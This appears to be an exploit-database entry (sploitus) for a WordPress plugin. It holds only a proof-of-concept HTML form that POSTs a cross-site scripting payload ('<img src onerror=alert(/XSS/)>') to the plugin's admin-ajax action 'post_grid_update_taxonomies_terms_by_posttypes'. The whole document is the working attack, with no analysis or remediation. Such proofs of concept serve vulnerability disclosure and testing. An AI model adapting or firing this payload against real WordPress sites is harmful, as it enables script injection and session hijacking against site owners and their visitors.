Share
## https://sploitus.com/exploit?id=WPEX-ID:91CA2CC9-951E-4E96-96FF-3BF131209DBE
<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=post_grid_update_taxonomies_terms_by_posttypes" method="POST">
        <input type="text" value="<html><img src onerror=alert(/XSS/)>" name="post_types">
        <input type="submit" value="Send">
    </form>
</html>